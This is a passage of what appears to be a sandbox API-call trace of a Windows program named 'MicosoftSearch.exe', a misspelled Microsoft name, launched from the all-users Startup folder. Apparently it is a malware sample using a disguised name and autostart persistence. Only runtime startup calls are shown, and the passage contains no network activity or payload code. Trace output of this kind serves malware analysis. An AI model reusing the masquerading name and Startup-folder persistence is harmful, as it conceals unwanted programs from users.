00000000:0000e4d3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x558 [0237.957] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xbb106820, dwHighDateTime=0x1d5351d)) [0237.957] GetCurrentProcessId () returned 0x554 [0237.957] GetCurrentThreadId () returned 0x558 [0237.957] GetTickCount () returned 0x6602 [0237.957] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=6961944465) returned 1 [0237.958] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x42c114)) [0237.958] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2440000 [0237.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.983] GetProcAddress (hModule=0x75a00000, lpProcName="FlsAlloc") returned 0x75a14f2b [0237.983] GetProcAddress (hModule=0x75a00000, lpProcName="FlsGetValue") returned 0x75a11252 [0237.983] GetProcAddress (hModule=0x75a00000, lpProcName="FlsSetValue") returned 0x75a14208 [0237.983] GetProcAddress (hModule=0x75a00000, lpProcName="FlsFree") returned 0x75a1359f [0237.984] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0237.984] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.035] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.035] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.036] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.036] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.036] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.036] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.036] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.037] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0238.037] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x214) returned 0x24407d0 [0238.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.037] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0238.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.037] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.037] GetProcAddress (hModule=0x75a00000, lpProcName="DecodePointer") returned 0x77449d35 [0238.037] GetCurrentThreadId () returned 0x558 [0238.037] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0238.037] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x800) returned 0x24409f0 [0238.037] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0238.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0238.038] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0238.038] SetHandleCount (uNumber=0x20) returned 0x20 [0238.038] GetCommandLineW () returned="\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe\" " [0238.038] GetEnvironmentStringsW () returned 0xac1e20* [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x0, Size=0xb02) returned 0x24411f8 [0238.038] FreeEnvironmentStringsW (penv=0xac1e20) returned 1 [0238.038] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x927d08, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe")) returned 0x4f [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x0, Size=0xa8) returned 0x2441d08 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x9c) returned 0x2441db8 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x3e) returned 0x2441e60 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x6c) returned 0x2441ea8 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x6e) returned 0x2441f20 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x78) returned 0x2441f98 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x62) returned 0x2442018 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x2e) returned 0x2442088 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x48) returned 0x24420c0 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x28) returned 0x2442110 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x1a) returned 0x2442140 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x4a) returned 0x2442168 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x72) returned 0x24421c0 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x30) returned 0x2442240 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x2e) returned 0x2442278 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x1c) returned 0x24422b0 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0xd2) returned 0x24422d8 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x7c) returned 0x24423b8 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x36) returned 0x2442440 [0238.038] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x3a) returned 0x2442480 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x90) returned 0x24424c8 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x24) returned 0x2442560 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x30) returned 0x2442590 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x36) returned 0x24425c8 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x48) returned 0x2442608 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x52) returned 0x2442658 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x3c) returned 0x24426b8 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x82) returned 0x2442700 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x2e) returned 0x2442790 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x28) returned 0x24427c8 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x1e) returned 0x24427f8 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x2c) returned 0x2442820 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x54) returned 0x2442858 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x52) returned 0x24428b8 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x2a) returned 0x2442918 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x3c) returned 0x2442950 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x54) returned 0x2442998 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x24) returned 0x24429f8 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x30) returned 0x2442a28 [0238.039] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x8c) returned 0x2442a60 [0238.039] HeapFree (in: hHeap=0x2440000, dwFlags=0x0, lpMem=0x24411f8 | out: hHeap=0x2440000) returned 1 [0238.073] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x8, Size=0x80) returned 0x2442af8 [0238.073] GetLastError () returned 0x0 [0238.073] SetLastError (dwErrCode=0x0) [0238.073] GetLastError () returned 0x0 [0238.073] SetLastError (dwErrCode=0x0) [0238.073] GetLastError () returned 0x0 [0238.073] SetLastError (dwErrCode=0x0) [0238.073] GetACP () returned 0x4e4 [0238.073] RtlAllocateHeap (HeapHandle=0x2440000, Flags=0x0, Size=0x220) returned 0x2442b80 [0238.073] GetLastError () returned 0x0 [0238.073] SetLastError (dwErrCode=0x0) [0238.073] IsValidCodePage (CodePage=0x4e4) returned 1 [0238.073] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0238.074] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0238.074] GetLastError () returned 0x0 [0238.074] SetLastError (dwErrCode=0x0) [0238.074] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0238.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0238.074] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0238.074] GetLastError () returned 0x0 [0238.074] SetLastError (dwErrCode=0x0) [0238.074] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0238.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⰵ倍BĀ") returned 256 [0238.074] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⰵ倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0238.074] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⰵ倍BĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0238.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x4b\x7a\x38\x25\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0238.074] GetLastError () returned 0x0 [0238.074] SetLastError (dwErrCode=0x0) [0238.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0238.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⰵ倍BĀ") returned 256 [0238.074] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⰵ倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0238.074] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿⰵ倍BĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0238.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\